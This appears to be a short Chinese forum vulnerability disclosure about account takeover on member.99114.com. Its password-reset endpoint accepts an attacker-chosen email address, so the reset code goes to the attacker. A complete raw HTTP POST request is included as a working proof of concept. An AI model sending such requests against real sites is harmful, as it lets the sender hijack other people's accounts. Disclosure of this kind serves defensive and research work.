可以修改任意帐号的密码哦，当然危害很大了，99114.com的，到底有厂商帐号没？
找回密码的地方，其实是发送一个post请求，参数是邮件地址跟用户名，直接修改邮箱为自己的邮箱，就可以了，就会发生修改的验证码到自己的邮箱。

后面你懂的，

POST /login/sendPwdEmail HTTP/1.1

Host: member.99114.com

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0

Accept: */*

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://member.99114.com/view/findpassword/passwordForm.jsp?siteId=5

Content-Length: 34

Cookie:

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

account=99114&email=123@qq.com

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！